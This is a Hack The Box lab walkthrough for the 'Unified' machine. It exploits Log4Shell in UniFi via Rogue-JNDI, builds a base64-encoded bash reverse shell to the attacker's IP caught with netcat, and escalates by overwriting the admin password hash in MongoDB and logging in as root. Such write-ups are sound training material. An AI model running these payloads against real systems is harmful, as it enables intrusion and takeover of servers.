---
sidebar_position: 4
sidebar_label: 🤲 Unified
description: ''
last_update:
  date: 2022/06/17
  author: Raúl Sánchez
tags:
  - BurpSuite
  - tcpdump
  - Rogue JNDI
  - netcat
  - MongoDB
  - UniFi
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Unified

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Unified Machine.](unified1.png)

Now you can see the **IP** address for that machine. Then we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/polybar/scripts/new\_htb\_box.sh) to add the IP address and hostname of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which htb
htb: aliased to sh ~/dotfiles/polybar/scripts/new_htb_box.sh
```

We will run the script and write the information of this machine.&#x20;

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.129.137.171
[?] Type the name of the box: Unified

[!] Hack The Box Machine
10.129.137.171 Unified.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.129.137.171            

[!] Working directory created
[!] Initial configuration completed
```

Before going to enumeration steps we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 unified.htb
PING Unified.htb (10.129.137.171) 56(84) bytes of data.
64 bytes from Unified.htb (10.129.137.171): icmp_seq=1 ttl=63 time=43.9 ms

--- Unified.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 43.872/43.872/43.872/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py unified.htb

unified.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -sV -sC unified.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-17 20:32 CEST
Nmap scan report for unified.htb (10.129.137.171)
Host is up (0.071s latency).
rDNS record for 10.129.137.171: Unified.htb
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Fri, 17 Jun 2022 18:33:08 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
|     Found</h1></body></html>
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Fri, 17 Jun 2022 18:33:08 GMT
|     Connection: close
|   RTSPRequest, Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 17 Jun 2022 18:33:08 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://unified.htb:8443/manage
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
```

As we see there are four open ports. 22/tcp is [ssh](https://en.wikipedia.org/wiki/Secure\_Shell), we don't know what 6789/tcp is. An [HTTP proxy](https://en.wikipedia.org/wiki/Proxy\_server) is running in 8080/tcp and 8443/tcp is running a SSL web server.

The proxy appears to redirect requests to the port 8443/tcp. We take note that the HTTP title of the page on port 8443 is `" UniFi Network "` version `6.4.54`.

![UniFi Login.](unified2.png)

Searching UniFi version 6.4.54 on our web browser we will find an [article](https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi) about a vulnerability.

### 1.2 Setup FoxyProxy

To pass on the request to BurpSuite we are going to use [FoxyProxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/). First install the extension for your browser. Then go to the options and add a new proxy.

![Add a new proxy configuration.](unified3.png)

Now, type the following configuration.

![Configuration of BurpSuite.](unified4.png)

> **FoxyProxy** is an advanced proxy management tool that completely replaces Firefox's limited proxying capabilities.

![Using the extension.](unified5.png)

We will can switch between using or not the proxy easily.

## 2. Foothold

### 2.1 Exploitation&#x20;

#### 2.1.1 BurpSuite

First, we attempt to login to the page with any the credentials as we aren’t trying to validate or gain access. The login request will be captured by **BurpSuite** and we will be able to modify it.

![Attempt any credentials.](unified6.png)

Before we modify the request, let's send this HTTPS packet to the `Repeater` module of BurpSuite.

![Request captured.](unified7.png)

Now we have to input our payload into the remember parameter. The output shows us an error message stating that the payload is invalid, but despite the error message the payload is actually being executed.

:::info
**JNDI** is the acronym for the `Java Naming and Directory Interface` API . By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.

**LDAP** is the acronym for `Lightweight Directory Access Protocol` , which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389 .
:::

![Identify an injection point if one exists.](unified8.png)

#### **2.1.2 tcpdump**

Then, we will use [**tcpdump**](https://www.tcpdump.org/) on port 389 which will monitor the network traffic for LDAP connections.

{% hint style="info" %}
**tcpdump** is a data-network packet analyzer computer program that runs under a command line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
{% endhint %}

Type this command in another terminal and click the `Send button` on the **Repeater** of BurpSuite again.

```shell
❯ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:43:51.212030 IP Unified.htb.41588 > 10.10.14.107.ldap: Flags [S], seq 859218733, win 64240, options [mss 1285,sackOK,TS val 1047441434 ecr 0,nop,wscale 7], length 0
20:43:51.212079 IP 10.10.14.107.ldap > Unified.htb.41588: Flags [R.], seq 0, ack 859218734, win 0, length 0
2 packets captured
2 packets received by filter
0 packets dropped by kernel
```

The `tcpdump` output shows a connection being received on our machine. This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.

We will have to install [Open-JDK](https://en.wikipedia.org/wiki/OpenJDK) and [Maven](https://maven.apache.org/) on our system in order to build a payload that we can send to the server and will give us Remote Code Execution on the vulnerable system.

```bash
sudo apt update && sudo apt upgrade
sudo apt install -y openjdk-11-jdk maven
```

Now we can check the version of Maven that we installed.

```bash
❯ mvn -v
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Apache Maven 3.6.3
Maven home: /usr/share/maven
Java version: 11.0.14.1, vendor: Debian, runtime: /usr/lib/jvm/java-11-openjdk-amd64
Default locale: es_ES, platform encoding: UTF-8
OS name: "linux", version: "5.16.0-kali7-amd64", arch: "amd64", family: "unix"
```

:::danger
**Open-JDK** is the Java Development kit, which is used to build Java applications. **Maven** on the other hand is an Integrated Development Environment (IDE) that can be used to create a structured project and compile our projects into jar files .
:::

#### 2.1.3 Rogue JNDI

Once we have installed the required packages, we now need to download and build the [Rogue-JNDI Java application](https://github.com/veracode-research/rogue-jndi).

```shell
❯ git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi
❯ mvn package
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[INFO] Scanning for projects...
[INFO] 
[INFO] ------------------------< RogueJndi:RogueJndi >-------------------------
[INFO] Building RogueJndi 1.1
[INFO] --------------------------------[ jar ]---------------------------------

[INFO] Including com.unboundid:unboundid-ldapsdk:jar:3.1.1 in the shaded jar.
[INFO] Including org.apache.tomcat.embed:tomcat-embed-core:jar:8.5.61 in the shaded jar.
[INFO] Replacing original artifact with shaded artifact.
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  41.056 s
[INFO] Finished at: 2022-06-17T17:16:50+02:00
[INFO] ------------------------------------------------------------------------
```

We will be Base64 encoding the payload to prevent any encoding issues.

```bash
❯ echo 'bash -c bash -i >&/dev/tcp/10.10.14.107/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA3LzQ0NDQgMD4mMQo=
```

After the payload has been created, start the `Rogue-JNDI` application while passing in the payload as part of the `--command` option.

```bash
❯ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTA3LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.107"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.107:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.107:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.107:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.107:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.107:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.107:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.107:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.107:1389/o=groovy to artsploit.controllers.Groovy
```

#### 2.1.4 Netcat

Now that the server is listening locally on port **389** , let's open another terminal and start a `Netcat` listener to capture the reverse shell.

```bash
❯ nc -lnvp 4444
listening on [any] 4444 ...
```

Going back to our intercepted **POST** request, let's change the payload to and click `Send` .

![Add payload.](unified9.png)

After sending the request, a connection to our rogue server is received.

```bash
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
```

Once we receive the output from the Rogue server, a shell spawns on our `Netcat` listener and we can upgrade the terminal shell using the following command.

```python
connect to [10.10.14.107] from (UNKNOWN) [10.129.137.171] 50834
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$ cd /home/michael
unifi@unified:/home/michael$ ls
    user.txt
unifi@unified:/home/michael$ cat user.txt
```

From here we can navigate to `/home/Michael/` and read the user **flag.**

### 2.2 Privilege Escalation

#### 2.2.1 MongoDB

First let's check if [**MongoDB**](https://www.mongodb.com/) is running on the target system.

```bash
unifi@unified:/home/michael$ ps aux | grep mongo
unifi         67  0.4  4.1 1103748 85124 ?       Sl   19:28   0:24 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       2672  0.0  0.0  11468  1140 pts/0    S+   21:01   0:00 grep mongo
```

We can see MongoDB is running on the target system on port **`27117`** .

:::note
**MongoDB** is a source-available cross-platform document-oriented database program. Classified as a NoSQL database program, MongoDB uses JSON-like documents with optional schemas.
:::

A quick search in the browser using the keywords `UniFi Default Database` shows that the default database name for the UniFi application is **`ace`** .

```json
unifi@unified:/home/michael$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
    "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
    "name" : "administrator",
    "email" : "administrator@unified.htb",
    "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
    "time_created" : NumberLong(1640900495),
    "last_site_name" : "default",
```

The output reveals a user called Administrator. Their password hash is located in the `x_shadow` variable. Now we can change the `x_shadow` password hash with our very own created hash in order to replace the administrators password and authenticate to the administrative panel.

```bash
❯ mkpasswd -m sha-512 AdminPasswd2022
$6$yyOUzZAZtvmkdJI1$4O9GqCeOAoYFjVZjkAo4QBcGvNbDRJL93V3ICRZj.bXMB7JHSBhnEg9UDXdQTz4WfgScH8mDGSr5dvHdqV9jL.
```

Let's proceed to replacing the existing hash with the one we created.

```bash
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$yyOUzZAZtvmkdJI1$4O9GqCeOAoYFjVZjkAo4QBcGvNbDRJL93V3ICRZj.bXMB7JHSBhnEg9UDXdQTz4WfgScH8mDGSr5dvHdqV9jL."}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
```

We can verify that the password has been updated in the `Mongo` database by running the same command as above. The `SHA-512` hash appears to have been updated.

```json
unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
    "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
    "name" : "administrator",
    "email" : "administrator@unified.htb",
    "x_shadow" : "$6$yyOUzZAZtvmkdJI1$4O9GqCeOAoYFjVZjkAo4QBcGvNbDRJL93V3ICRZj.bXMB7JHSBhnEg9UDXdQTz4WfgScH8mDGSr5dvHdqV9jL.",
    "time_created" : NumberLong(1640900495),
    "last_site_name" : "default",
```

#### 2.2.2 Web Dashboard

Let's now visit the website and log in as **administrator** .

![Login as administrator with our password.](unified10.png)

Now we have administrative access to the `UniFi application`.

![Administrator dashboard.](unified11.png)

Navigate to `settings -> site` and scroll down to find the SSH Authentication setting. SSH authentication with a **`root`** password has been enabled.

![Shows the root password in plaintext.](unified12.png)

#### 2.2.3 SSH

Let's attempt to authenticate to the system as **root** over **SSH**.

```bash
❯ ssh root@unified.htb
The authenticity of host 'unified.htb (10.129.137.171)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'unified.htb' (ED25519) to the list of known hosts.
root@unified.htb's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.
```

The connection is successful and the **root** flag can be found in `/root`.

```batch
root@unified:~# ls
root.txt
root@unified:~# cat root.txt
```
